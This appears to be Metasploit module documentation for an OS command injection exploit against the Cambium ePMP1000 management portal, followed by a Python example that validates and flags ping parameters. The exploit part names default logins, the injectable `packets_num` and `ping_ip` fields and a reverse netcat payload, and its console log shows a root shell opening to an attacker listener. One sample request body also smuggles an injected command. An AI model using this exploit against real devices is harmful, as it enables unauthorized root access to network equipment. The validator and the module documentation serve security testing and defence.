This module exploits an OS command injection vulnerability in the Cambium ePMP1000 device management portal. It requires any one of the following login credentials to set up a reverse netcat shell: admin/admin, installer/installer, or home/home. The module injects the payload in the `packets_num` parameter. Alternatively, a second vulnerable parameter, `ping_ip`, can also be used.

Note: `cmd/unix/reverse_netcat` is the only payload that seems to work and is stable. After the session is opened, there may be a slight delay in the response to the first command issued. There are no delays in receiving responses to subsequent commands. It is recommended to use `exploit -j`.

## Verification Steps

1. Do: ```use exploit/unix/http/epmp1000_ping_cmd_shell```
2. Do: ```set RHOST [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```set LHOST [IP]```
5. Do: ```exploit -j```

## Scenarios

```
msf > use exploit/unix/http/epmp1000_ping_cmd_shell
msf exploit(epmp1000_ping_cmd_shell) > set RHOST 192.168.0.2
msf exploit(epmp1000_ping_cmd_shell) > set RPORT 80
msf exploit(epmp1000_ping_cmd_shell) > set LHOST 192.168.0.104
msf exploit(epmp1000_ping_cmd_shell) > exploit -j

[*] Started reverse TCP handler on 192.168.0.104:4444
[+] SUCCESSFUL LOGIN - 192.168.0.2:80 - "installer":"installer"
[*] Sending payload...
[*] Command shell session 10 opened (192.168.0.104:4444 -> 192.168.0.2:43594) at 2017-12-02 06:08:00 +0700

msf exploit(epmp1000_ping_cmd_shell) > sessions -l

Active sessions
===============

  Id  Type            Information  Connection
  --  ----            -----------  ----------
  10  shell cmd/unix               192.168.0.104:4444 -> 192.168.0.2:43594 (192.168.0.2)

msf exploit(epmp1000_ping_cmd_shell) > sessions -i 10
[*] Starting interaction with 10...

id
uid=0(root) gid=0(root)
```
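The `packets_num` and `ping_ip` parameters named above are only injectable if their values reach a shell unchecked. The following is an added example, not code from the module or from the device firmware: it shows strict allow-list validation of a ping request and the same check reused to flag suspicious logged request bodies. The URL-encoded body format, the `MAX_PACKETS` bound, the IPv4-only policy and the function names are assumptions made for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs

MAX_PACKETS = 10  # assumed upper bound for a diagnostic ping; not a vendor value


def check_ping_params(body):
    """Return a list of problems in a URL-encoded ping request body (empty = clean)."""
    fields = parse_qs(body, keep_blank_values=True)
    problems = []

    count = fields.get("packets_num", [])
    if len(count) != 1:
        problems.append("packets_num: expected exactly one value")
    elif not re.fullmatch(r"[0-9]{1,3}", count[0]):
        problems.append("packets_num: not a short decimal integer: %r" % count[0])
    elif not 1 <= int(count[0]) <= MAX_PACKETS:
        problems.append("packets_num: out of range: %s" % count[0])

    target = fields.get("ping_ip", [])
    if len(target) != 1:
        problems.append("ping_ip: expected exactly one value")
    else:
        try:
            # IPv4 only: on Python 3.9+ IPv6Address accepts a free-form "%scope" suffix.
            ipaddress.IPv4Address(target[0])
        except ValueError:
            problems.append("ping_ip: not an IPv4 literal: %r" % target[0])
    return problems


def ping_argv(body):
    """Build an argument vector for ping; the values never pass through a shell."""
    problems = check_ping_params(body)
    if problems:
        raise ValueError("; ".join(problems))
    fields = parse_qs(body)
    return ["ping", "-c", fields["packets_num"][0], fields["ping_ip"][0]]


# Constructed sample request bodies (not captured traffic).
SAMPLES = [
    "ping_ip=192.168.0.2&packets_num=4",
    "ping_ip=192.168.0.2&packets_num=4%3B+echo+constructed",
    "ping_ip=fe80%3A%3A1%25x&packets_num=4",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(body, "->", check_ping_params(body) or "ok")
```

Run over logged POST bodies, any non-empty result is worth an alert, since a legitimate ping form has no reason to send anything but a short integer and an address.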